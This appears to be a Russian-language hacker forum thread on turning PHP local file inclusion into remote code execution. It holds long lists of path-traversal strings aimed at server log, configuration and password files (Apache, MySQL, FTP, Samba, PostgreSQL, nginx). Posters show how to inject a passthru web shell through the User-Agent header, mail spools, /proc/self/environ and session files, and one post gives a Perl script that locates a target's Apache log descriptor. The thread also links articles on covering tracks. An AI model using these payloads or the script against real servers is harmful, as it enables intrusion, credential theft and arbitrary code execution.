Apache: *log Code: ../../../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../../../var/log/httpd/error_log ../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../var/log/httpd/error_log ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../apache/logs/error.log ../../../../apache/logs/access.log ../../../../../apache/logs/error.log ../../../../../apache/logs/access.log ../apache2/logs/error.log ../apache2/logs/access.log ../../apache2/logs/error.log ../../apache2/logs/access.log ../../../apache2/logs/error.log ../../../apache2/logs/access.log ../../../../apache2/logs/error.log ../../../../apache2/logs/access.log ../../../../../apache2/logs/error.log ../../../../../apache2/logs/access.log ../logs/error.log ../logs/access.log ../../logs/error.log ../../logs/access.log ../../../logs/error.log ../../../logs/access.log ../../../../logs/error.log ../../../../logs/access.log ../../../../../logs/error.log ../../../../../logs/access.log ../../../../../../../../../../etc/httpd/logs/acces_log ../../../../../../../../../../etc/httpd/logs/acces.log ../../../../../../../../../../etc/httpd/logs/error_log ../../../../../../../../../../etc/httpd/logs/error.log ../../../../../../../../../../usr/local/apache/logs/access_log ../../../../../../../../../../usr/local/apache/logs/access.log ../../../../../../../../../../usr/local/apache/logs/error_log ../../../../../../../../../../usr/local/apache/logs/error.log ../../../../../../../../../../usr/local/apache2/logs/access_log ../../../../../../../../../../usr/local/apache2/logs/access.log ../../../../../../../../../../usr/local/apache2/logs/error_log ../../../../../../../../../../usr/local/apache2/logs/error.log ../../../../../../../../../../var/www/logs/access_log ../../../../../../../../../../var/www/logs/access.log 
../../../../../../../../../../var/www/logs/error_log ../../../../../../../../../../var/www/logs/error.log ../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../var/log/httpd/access.log ../../../../../../../../../../var/log/httpd/error_log ../../../../../../../../../../var/log/httpd/error.log ../../../../../../../../../../var/log/apache/access_log ../../../../../../../../../../var/log/apache/access.log ../../../../../../../../../../var/log/apache/error_log ../../../../../../../../../../var/log/apache/error.log ../../../../../../../../../../var/log/apache2/access_log ../../../../../../../../../../var/log/apache2/access.log ../../../../../../../../../../var/log/apache2/error_log ../../../../../../../../../../var/log/apache2/error.log ../../../../../../../../../../var/log/access_log ../../../../../../../../../../var/log/access.log ../../../../../../../../../../var/log/error_log ../../../../../../../../../../var/log/error.log ../../../../../../../../../../opt/lampp/logs/access_log ../../../../../../../../../../opt/lampp/logs/error_log ../../../../../../../../../../opt/xampp/logs/access_log ../../../../../../../../../../opt/xampp/logs/error_log ../../../../../../../../../../opt/lampp/logs/access.log ../../../../../../../../../../opt/lampp/logs/error.log ../../../../../../../../../../opt/xampp/logs/access.log ../../../../../../../../../../opt/xampp/logs/error.log ../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log ../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../apache/logs/error.log ../../../../apache/logs/access.log ../../../../../apache/logs/error.log ../../../../../apache/logs/access.log ../../../../../../apache/logs/error.log ../../../../../../apache/logs/access.log ../../../../../../../apache/logs/error.log ../../../../../../../apache/logs/access.log ../../../../../../../../apache/logs/error.log 
../../../../../../../../apache/logs/access.log ../../../logs/error.log ../../../logs/access.log ../../../../logs/error.log ../../../../logs/access.log ../../../../../logs/error.log ../../../../../logs/access.log ../../../../../../logs/error.log ../../../../../../logs/access.log ../../../../../../../logs/error.log ../../../../../../../logs/access.log ../../../../../../../../logs/error.log ../../../../../../../../logs/access.log ../../../../../../../../../../../../etc/httpd/logs/acces_log ../../../../../../../../../../../../etc/httpd/logs/acces.log ../../../../../../../../../../../../etc/httpd/logs/error_log ../../../../../../../../../../../../etc/httpd/logs/error.log ../../../../../../../../../../../../var/www/logs/access_log ../../../../../../../../../../../../var/www/logs/access.log ../../../../../../../../../../../../usr/local/apache/logs/access_log ../../../../../../../../../../../../usr/local/apache/logs/access.log ../../../../../../../../../../../../var/log/apache/access_log ../../../../../../../../../../../../var/log/apache/access.log ../../../../../../../../../../../../var/log/access_log ../../../../../../../../../../../../var/www/logs/error_log ../../../../../../../../../../../../var/www/logs/error.log ../../../../../../../../../../../../usr/local/apache/logs/error_log ../../../../../../../../../../../../usr/local/apache/logs/error.log ../../../../../../../../../../../../var/log/apache/error_log ../../../../../../../../../../../../var/log/apache/error.log ../../../../../../../../../../../../var/log/access_log ../../../../../../../../../../../../var/log/error_log *conf Code: ../../../../../../usr/local/apache/conf/httpd.conf ../../../../../../usr/local/apache2/conf/httpd.conf ../../../../../../etc/httpd/conf/httpd.conf ../../../../../../etc/apache/conf/httpd.conf ../../../../../../usr/local/etc/apache/conf/httpd.conf ../../../../../../etc/apache2/httpd.conf ../../../../../../../../../usr/local/apache/conf/httpd.conf 
../../../../../../../../../usr/local/apache2/conf/httpd.conf ../../../../../../../../usr/local/apache/httpd.conf ../../../../../../../../usr/local/apache2/httpd.conf ../../../../../../../../usr/local/httpd/conf/httpd.conf ../../../../../../../usr/local/etc/apache/conf/httpd.conf ../../../../../../../usr/local/etc/apache2/conf/httpd.conf ../../../../../../../usr/local/etc/httpd/conf/httpd.conf ../../../../../../../usr/apache2/conf/httpd.conf ../../../../../../../usr/apache/conf/httpd.conf ../../../../../../../usr/local/apps/apache2/conf/httpd.conf ../../../../../../../usr/local/apps/apache/conf/httpd.conf ../../../../../../etc/apache/conf/httpd.conf ../../../../../../etc/apache2/conf/httpd.conf ../../../../../../etc/httpd/conf/httpd.conf ../../../../../../etc/http/conf/httpd.conf ../../../../../../etc/apache2/httpd.conf ../../../../../../etc/httpd/httpd.conf ../../../../../../etc/http/httpd.conf ../../../../../../etc/httpd.conf ../../../../../opt/apache/conf/httpd.conf ../../../../../opt/apache2/conf/httpd.conf ../../../../var/www/conf/httpd.conf ../../../private/etc/httpd/httpd.conf ../../../private/etc/httpd/httpd.conf.default ../../Volumes/webBackup/opt/apache2/conf/httpd.conf ../../Volumes/webBackup/private/etc/httpd/httpd.conf ../../Volumes/webBackup/private/etc/httpd/httpd.conf.default ../../../../../../../../../Program Files\Apache Group\Apache\conf\httpd.conf ../../../../../../../../../Program Files\Apache Group\Apache2\conf\httpd.conf ../../../../../../../../../Program Files\xampp\apache\conf\httpd.conf ../../../../../../../../../usr/local/php/httpd.conf.php ../../../../../../../../../usr/local/php4/httpd.conf.php ../../../../../../../../../usr/local/php5/httpd.conf.php ../../../../../../../../../usr/local/php/httpd.conf ../../../../../../../../../usr/local/php4/httpd.conf ../../../../../../../../../usr/local/php5/httpd.conf ../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf 
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf ../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php /usr/local/etc/apache/vhosts.conf php.ini Code: ../../../../../../../../../etc/php.ini ../../../../../../../../../bin/php.ini ../../../../../../../../../etc/httpd/php.ini ../../../../../../../../../usr/lib/php.ini ../../../../../../../../../usr/lib/php/php.ini ../../../../../../../../../usr/local/etc/php.ini ../../../../../../../../../usr/local/lib/php.ini ../../../../../../../../../usr/local/php/lib/php.ini ../../../../../../../../../usr/local/php4/lib/php.ini ../../../../../../../../../usr/local/php5/lib/php.ini ../../../../../../../../../usr/local/apache/conf/php.ini ../../../../../../../../../etc/php4.4/fcgi/php.ini ../../../../../../../../../etc/php4/apache/php.ini ../../../../../../../../../etc/php4/apache2/php.ini ../../../../../../../../../etc/php5/apache/php.ini ../../../../../../../../../etc/php5/apache2/php.ini ../../../../../../../../../etc/php/php.ini ../../../../../../../../../etc/php/php4/php.ini ../../../../../../../../../etc/php/apache/php.ini ../../../../../../../../../etc/php/apache2/php.ini ../../../../../../../../../web/conf/php.ini ../../../../../../../../../usr/local/Zend/etc/php.ini ../../../../../../../../../opt/xampp/etc/php.ini ../../../../../../../../../var/local/www/conf/php.ini ../../../../../../../../../etc/php/cgi/php.ini ../../../../../../../../../etc/php4/cgi/php.ini ../../../../../../../../../etc/php5/cgi/php.ini ../../../../../../../../../php5\php.ini ../../../../../../../../../php4\php.ini ../../../../../../../../../php\php.ini ../../../../../../../../../PHP\php.ini ../../../../../../../../../WINDOWS\php.ini 
../../../../../../../../../WINNT\php.ini ../../../../../../../../../apache\php\php.ini ../../../../../../../../../xampp\apache\bin\php.ini ../../../../../../../../../NetServer\bin\stable\apache\php.ini ../../../../../../../../../home2\bin\stable\apache\php.ini ../../../../../../../../../home\bin\stable\apache\php.ini ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini Cpanel: *log /usr/local/cpanel/logs /usr/local/cpanel/logs/stats_log /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log *conf /var/cpanel/cpanel.config MySQL: *log /var/log/mysql/mysql-bin.log /var/log/mysql.log /var/log/mysqlderror.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/mysql.log *conf /var/lib/mysql/my.cnf /etc/mysql/my.cnf /etc/my.cnf MySQL(Windows): *log Code: C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log C:\Program Files\MySQL\data\hostname.err C:\Program Files\MySQL\data\mysql.log C:\Program Files\MySQL\data\mysql.err C:\Program Files\MySQL\data\mysql-bin.log C:\MySQL\data\hostname.err C:\MySQL\data\mysql.log C:\MySQL\data\mysql.err C:\MySQL\data\mysql-bin.log *conf Code: C:\Program Files\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.0\my.cnf C:\Program Files\MySQL\my.ini C:\Program Files\MySQL\my.cnf C:\MySQL\my.ini C:\MySQL\my.cnf Mod Security: *log /usr/local/apache/logs/audit_log /logs/security_debug_log /logs/security_log *conf /usr/local/apache/conf/modsec.conf FTP: ProFTPD: *log /etc/logrotate.d/proftpd /www/logs/proftpd.system.log /var/log/proftpd *conf /etc/proftp.conf /etc/protpd/proftpd.conf /etc/vhcs2/proftpd/proftpd.conf /etc/proftpd/modules.conf vsftpd: *log /var/log/vsftpd.log /etc/vsftpd.chroot_list 
/etc/logrotate.d/vsftpd.log *conf /etc/vsftpd/vsftpd.conf /etc/vsftpd.conf /etc/chrootUsers wu-ftpd: *log /var/log/xferlog /var/adm/log/xferlog *conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers Pure-FTPd: *conf /usr/sbin/pure-config.pl /usr/etc/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.conf /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/pureftpd/etc/pureftpd.pdb /usr/local/pureftpd/sbin/pure-config.pl /usr/local/pureftpd/etc/pure-ftpd.conf -/etc/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pureftpd.pdb /etc/pureftpd.passwd /etc/pure-ftpd/pureftpd.pdb DragonflyBSD & FreeBSD: /usr/ports/ftp/pure-ftpd/ OpenBSD: /usr/ports/net/pure-ftpd/ NetBSD: /usr/pkgsrc/net/pureftpd/ Crux Linux: /usr/ports/contrib/pure-ftpd/ *log /var/log/pure-ftpd/pure-ftpd.log /logs/pure-ftpd.log /var/log/pureftpd.log Other: /var/log/ftp-proxy/ftp-proxy.log /var/log/ftp-proxy /var/log/ftplog /etc/logrotate.d/ftp /etc/ftpchroot /etc/ftphosts Mail server:Exim: *log /var/log/exim_mainlog /var/log/exim/mainlog /var/log/maillog /var/log/exim_paniclog /var/log/exim/paniclog /var/log/exim/rejectlog /var/log/exim_rejectlog Информация к размышлению: - Выполнение команд через локальный инклюд - Логи для умных - ЗАМЕТАЕМ СЛЕДЫ В LINUX - Скажи логам нет! - В борьбе с журнальными бестиями - Боремся с логами в *nix - Боремся с логами в *nix #2 - Бортжурнал юниксоида - О взломе лог файлов thx [53x]Shadow
В аттаче - элементарная утилитка для проверки GET инклудов. Если у вас есть РАСПРОСТРАНЕННЫЙ ПУТЬ, отсутствующий в списке, - запостите его.
Значит, помниццо были разговоры про то, что при инклуде логов возникают проблемы и т.п. В error_log часто пишется "Referer". В access_log - "User-Agent". И касательно мифа о том, что символы < > кодируюццо в URL-аналоги и "ничего не сделаешь" - запустите любой HTTP-сниффер, и вы увидите, что это браузер виноват - он автоматом переводит символы в урл. Просто пошлите пакет любой тулзой типа AccessDriver.
... Code: ../../../../../../usr/local/apache/bin/httpd ../../../../../../../../../usr/local/apache/conf/httpd.conf.default ../../../../../../../../etc/httpd/logs/access_log ../../../../../../../../etc/httpd/logs/access.log ../../../../../../../../../usr/local/apache/conf/access.conf
MuddleFTPD *log Code: /var/log/muddleftpd /usr/sbin/mudlogd /etc/muddleftpd/mudlog *conf Code: /etc/muddleftpd.com /etc/muddleftpd/mudlogd.conf /etc/muddleftpd/muddleftpd.conf /var/log/muddleftpd.conf /usr/sbin/mudpasswd /etc/muddleftpd/muddleftpd.passwd /etc/muddleftpd/passwd
В большинстве случаев сервер под управлением Win NT хранит свои лог-файлы в следующих директориях: HTTP: %SystemRoot%\system32\logfiles\W3SVC#(W3SVC1,W3SVC2,W3SVC3...)\ FTP: %SystemRoot%\system32\logfiles\MSFTPSVC#(MSFTPSVC4,MSFTPSVC5...)\ SMTP: %SystemRoot%\system32\logfiles\SMTPSVC#(SMTPSVC1,SMTPSVC2...)\ # - обозначает номер веб-сайта (номер узла) (по умолчанию равен "1") Имя файла соответствует дате его создания: in02039.log (2002, 9-е марта) Примечание по типам журналов: IIS аббревиатурой служит "in" W3C аббревиатурой служит "ex" NCSA аббревиатурой служит "nc" Отчёты стандартного Firewall'а: %SystemRoot%\system32\logfiles\Firewall\pfirewall.log %SystemRoot%\system32\logfiles\Firewall\pfirewall.log.old
lighthttpd *log /var/log/lighttpd.error.log /var/log/lighttpd.access.log /var/lighttpd.log /var/logs/access.log /var/log/lighttpd/ /var/log/lighttpd/error.log /var/log/lighttpd/access.www.log /var/log/lighttpd/error.www.log /var/log/lighttpd/access.log /usr/local/apache2/logs/lighttpd.error.log /usr/local/apache2/logs/lighttpd.log /usr/local/apache/logs/lighttpd.error.log /usr/local/apache/logs/lighttpd.log /var/log/lighttpd.access.log /var/log/lighttpd.error.log /usr/local/lighttpd/log/lighttpd.error.log /usr/local/lighttpd/log/access.log /var/log/lighttpd/mydomain/access.log /var/log/lighttpd/mydomain/error.log /usr/home/user/var/log/lighttpd.error.log /usr/home/user/var/log/apache.log *conf /home/user/lighttpd/lighttpd.conf /usr/home/user/lighttpd/lighttpd.conf /etc/lighttpd/lighthttpd.conf /usr/local/etc/lighttpd.conf /usr/local/lighttpd/conf/lighttpd.conf /usr/local/etc/lighttpd.conf.new /var/www/.lighttpdpassword Samba*conf /etc/smbpasswd /etc/smb.conf /etc/samba/smb.conf /etc/samba/samba.conf /etc/samba/smb.conf.user /etc/samba/smbpasswd /etc/samba/smbusers /etc/samba/private/smbpasswd /etc/samba/smb.conf.198.166.0.5 /usr/local/samba/lib/smb.conf.198.166.0.5 /usr/local/etc/smb.conf /usr/local/samba/lib/smb.conf.user /daten/home/gr-user *log /usr/local/samba/lib/log.user /usr/local/logs/samba.log /usr/local/samba/lib/log.198.166.0.5 /var/log/samba/log.smbd /var/log/samba/log.nmbd /var/log/samba.log /var/log/samba.log1 /var/log/samba.log2 /var/log/samba/samba_198.166.0.5.log /var/log/samba/198.166.0.5.log /var/log/samba.198.166.0.5 /var/log/samba.log.198.166.0.5 /var/log/samba/198.166.0.5 /var/log/log.smb /var/log/samba-log.198.166.0.5 /etc/samba/netlogon
PostgreSQL *log /var/postgresql/log/postgresql.log /var/log/postgresql/postgresql.log /var/log/postgres/pg_backup.log /var/log/postgres/postgres.log /var/log/postgresql.log /var/log/pgsql/pgsql.log /var/log/postgresql/postgresql-8.1-main.log /var/log/pgsql8.log /var/log/postgresql/postgres.log /var/log/pgsql_log /var/log/postgresql/main.log /var/log/cron /var/log/postgres.log /usr/internet/pgsql/data/postmaster.log /usr/local/pgsql/data/postgresql.log /usr/local/pgsql/data/pg_log c:\PostgreSQL\log\pgadmin.log *conf /var/lib/pgsql/data/postgresql.conf /var/postgresql/db/postgresql.conf /var/nm2/postgresql.conf /usr/local/pgsql/data/postgresql.conf /usr/local/pgsql/data/pg_hba.conf /usr/internet/pgsql/data/pg_hba.conf /usr/local/pgsql/data/passwd /usr/local/pgsql/bin/pg_passwd /etc/postgresql/postgresql.conf /etc/postgresql/pg_hba.conf /home/postgres/data/postgresql.conf /home/postgres/data/PG_VERSION /home/postgres/data/pg_ident.conf /home/postgres/data/pg_hba.conf Error Reporting and Logging
ipfw (BSD) *log /var/log/ipfw.log /var/log/ipfw /var/log/ipfw/ipfw.log /var/log/ipfw.today *conf /etc/ipfw.rules /etc/ipfw.conf /etc/firewall.rules
*обновление постов. Структура архива: _all_apache.log.txt _all_httpd.conf.txt _all_log.txt -LAMPP, XAMPP, Apache. _all_php.ini.txt _all_mysql.txt _all_mysql_win.txt _all_cpanel.txt _all_modsecurity.txt _all_ftp.txt -ProFTPD, vsftpd, wu-ftpd,Pure-FTPd, MuddleFTPD. _all_samba.txt _all_lighthttpd.txt _all_postgresq.txt
1) юзаем логи, не зная к ним пути a. /proc/%{PID}/fd/%{FD_ID} %{PID} - пид %{FD_ID} - ярлыки, (1,2,3,..,9) 2 и 7 логи апача (не факт что всегда, у меня были тоже 2 и 7) /proc/self/status - смотрим пид /proc/%{PID}/fd/%{FD_ID} -> /proc/3661/fd/2 index.php?inc=../../../../../proc/3661/fd/2 User-Agent: <?php passthru($_GET['cmd']) ?> Code: dr-x------ 2 www-data www-data 0 Jan 2 18:27 . dr-xr-xr-x 6 www-data www-data 0 Jan 2 18:27 .. lr-x------ 1 www-data www-data 64 Jan 2 18:27 0 -> /dev/null l-wx------ 1 www-data www-data 64 Jan 2 18:27 1 -> pipe:[3113414] l-wx------ 1 www-data www-data 64 Jan 2 18:27 2 -> /var/log/apache2/error.log lrwx------ 1 www-data www-data 64 Jan 2 18:27 3 -> socket:[2714910] lr-x------ 1 www-data www-data 64 Jan 2 18:27 4 -> pipe:[2714921] l-wx------ 1 www-data www-data 64 Jan 2 18:27 5 -> pipe:[2714921] l-wx------ 1 www-data www-data 64 Jan 2 18:27 6 -> /var/log/apache2/access.log lrwx------ 1 www-data www-data 64 Jan 2 18:27 7 -> /anon_inode:[eventpoll] lrwx------ 1 www-data www-data 64 Jan 2 18:27 8 -> socket:[2742717] lr-x------ 1 www-data www-data 64 Jan 2 18:27 9 -> /proc/27262/fd b. напрямую index.php?inc=../../../../../proc/self/fd/2 User-Agent: <?php passthru($_GET['cmd']) ?> 2) переменные окружения (если неправильно понял - поправьте) index.php?inc=../../../../../proc/self/environ POST: User-Agent: <?php passthru($_GET['cmd']) ?> 3) mail PHP: <? mail("ololo@localhost", "<?php passthru(\$_GET['cmd']) ?>", "fuckme"); ?> index.php?inc=../../../../../var/mail/ololo index.php?inc=../../../../../var/spool/mail/ololo зы. /proc/version /proc/self/cmdline /proc/devices по мотивам Code: http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/ http://www.milw0rm.com/papers/260 http://itbloggen.se/cs/blogs/secteam/archive/2009/01/26/alternative-ways-to-exploit-PHP-remote-file-include-vulnerabilities.aspx
Скрипт для поиска путей логов Apache Code: #! /usr/bin/perl # perl script to serach apache logs path # Example: # URL: http://site/index.php # Variable: file # Method: POST # # by Pepelux (pepelux[at]enye-sec[dot]org) use LWP::UserAgent; $ua = LWP::UserAgent->new; my ($host, $var, $method) = @ARGV ; unless($ARGV[2]) { print "Usage: perl $0 <url> <vulnerable_var> <method>\n"; print "\tex: perl $0 http://site.com/index.php file GET\n"; print "\tex: perl $0 http://site.com/index.php file POST\n\n"; exit 1; } $ua->agent("<? passthru(\$_GET[cmd]) ?>"); $ua->timeout(10); $host = "http://".$host if ($host !~ /^http:/); if ($method =~ /GET/) { $url = $host."?".$var."=../../../../proc/self/stat%00"; $req = HTTP::Request->new(GET => $url); $req->header('Accept' => 'text/html'); } else { $req = HTTP::Request->new(POST => $host); $req->content_type('application/x-www-form-urlencoded'); $req->content($var."=../../../../proc/self/stat%00"); } $res = $ua->request($req); if ($res->is_success) { $result = $res->content; $result =~ s/<[^>]*>//g; $x = index($result, " ", 0); $pid = substr($result, 0, $x); print "Apache PID: ".$pid."\n"; } if ($method =~ /GET/) { $url = $host."?".$var."=../../../../proc/self/status%00"; $req = HTTP::Request->new(GET => $url); $req->header('Accept' => 'text/html'); } else { $req = HTTP::Request->new(POST => $host); $req->content_type('application/x-www-form-urlencoded'); $req->content($var."=../../../../proc/self/status%00"); } $res = $ua->request($req); if ($res->is_success) { $result = $res->content; $result =~ s/<[^>]*>//g; $x = index($result, "FDSize",0)+8; $fdsize = substr($result, $x, 3); print "FD_SIZE: ".$fdsize."\n"; } for ($cont = 0; $cont < $fdsize; $cont++) { $file = "../../../../proc/".$pid."/fd/".$cont; open FILE, $file; while(<FILE>) { if (($_ =~ /does not exist/) && ($_ =~ /passthru/)) { print "FD: ".$cont."\n"; exit; } } }
Немного проверил то, что c411k написал: mail-файл доступен только юзеру, чей mail, так что, чтобы прочитать, нужен и апач под тем же юзером; всяким www, nobody, apache по дефолту запрещается иметь ящик. /proc/self/environ у меня пустой, не знаю, как будет при php в cgi-моде. Лог-файлы да, читаются на ура, только если прав хватит; проверил на других хостах - только рут может логи читать (, потом ещё через файл сессии можно инклуд сделать, у меня он находится в /proc/self/fd/10
Рассмотрим ситуацию, когда уникальному пользователю присваивается идентификатор SID (Session IDentifier) без какой-либо фильтрации входящего содержимого. Независимо от способа его передачи (Cookie/Query string), на сервере будет создан "файл сеанса", при условии, что session.save_handler соответствует значению files, в каталоге, определённом директивой session.save_path. Главным плюсом является то, что обслуживание хостов на сервере будет производиться одним процессом. Session.save_path: /tmp/sess_<session_id> /php_sess/sess_<session_id> /tmp/php-sess/sess_<session_id> /home/%username%/tmp/sess_<session_id> ../../../../tmp/sess_7083093d3b1e818d5c86c79b0f62a374&cmd=id
osx httpd conf /etc/osxhttpd/osxhttpd.conf /System/Library/WebObjects/Adaptors/Apache2.2/apache.conf osx site conf /etc/apache2/sites/*.conf" /etc/httpd/sites/000[1...]_[IP]_[PORT]_[SITE_NAME].conf Пример: 0002_18.80.2.252_80_meche.mit.edu.conf default site dir /Library/WebServer/Documents/ Webmin conf /usr/local/etc/webmin/miniserv.conf /etc/webmin/miniserv.conf /usr/local/etc/webmin/miniserv.users /etc/webmin/miniserv.users log /var/log/webmin/miniserv.log
SquirrelMail *log /usr/share/squirrelmail/plugins/squirrel_logger/setup.php $sl_logfile = "/var/log/squirrelmail.log"; /var/log/apache2/squirrelmail.log /var/log/apache2/squirrelmail.err.log /var/lib/squirrelmail/prefs/squirrelmail.log /var/log/squirrelmail.log /var/log/mail.log ls: #ls /usr/local/squirrelmail/www/ Code: AUTHORS configure doc include plugins src ChangeLog contrib functions index.php po themes class COPYING help INSTALL README UPGRADE config data images locale ReleaseNotes # ls /var/local/squirrelmail/ Code: attach data # ls /etc/squirrelmail/ Code: apache.conf config_local.php default_pref index.php config_default.php config.php filters_setup.php sqspell_config.php *conf /etc/squirrelmail/config/config.php /etc/squirrelmail/config.php /etc/httpd/conf.d/squirrelmail.conf /usr/share/squirrelmail/config/config.php /private/etc/squirrelmail/config/config.php /srv/www/htdos/squirrelmail/config/config.php /var/www/squirrelmail/config/config.php /var/www/html/squirrelmail/config/config.php /var/www/html/squirrelmail[Version]/config/config.php (/var/www/html/squirrelmail-1.2.9/config/config.php) Plugin /etc/squirrelmail/plugins /usr/share/squirrelmail/plugins /usr/share/squirrelmail/config/config.php $plugins[1] = 'squirrel_logger'; $plugins[2] ...
Насколько я понял, выполнить код через /proc/self/environ получится только если php работает как cgi, иначе /proc/self/environ будет указывать на окружение апача. Проверить легко: если в /proc/self/cmdline что-то вроде Code: /usr/sbin/apache2�-k�start� то php не cgi и код внедрить в /proc/self/environ не получится.
Небольшое дополнение к материалу, предоставленному c411k 1 На фре это работать не будет. Там немного по-другому всё устроено и по умолчанию proc/ не используется. 2 Через пиды искать логи бесполезно, да и не нужно, дело в том, что proc/self/ это как раз ссылка на каталог с данными процесса, а proc/self/fd в свою очередь директория, содержащая ссылки на файлы, которые использует процесс. Так что всё проще. ============================= И также по дефолтным логам добавлю из своих наблюдений: На Апаче 2.2.x частенько попадаются директории apache22/ т.е. и т.д.
nginx *.conf: Code: ../../../../../../etc/nginx/srv.d/*.conf ../../../../../../etc/nginx/nginx.conf ../../../../../../usr/local/etc/nginx/nginx.conf ../../../../../../usr/local/nginx/conf/nginx.conf logs: Code: ../../../../../../var/log/nginx/access_log ../../../../../../var/log/nginx/error_log ../../../../../../var/log/nginx/access.log ../../../../../../var/log/nginx/error.log ../../../../../../var/log/nginx.access_log ../../../../../../var/log/nginx.error_log ../../../../../../logs/access_log ../../../../../../logs/error_log ../../../../../../logs/access.log ../../../../../../logs/error.log ../../../../../../var/www/<domain.com>/log/nginx.access.log ../../../../../../var/www/<domain.com>/log/nginx.error.log ../../../../../../var/www/<domain.com>/log/nginx.access_log ../../../../../../var/www/<domain.com>/log/nginx.error_log ../../../../../../var/log/nginx/<domain.com>.access.log ../../../../../../var/log/nginx/<domain.com>.error.log ../../../../../../var/log/nginx/<domain.com>_access.log ../../../../../../var/log/nginx/<domain.com>_error.log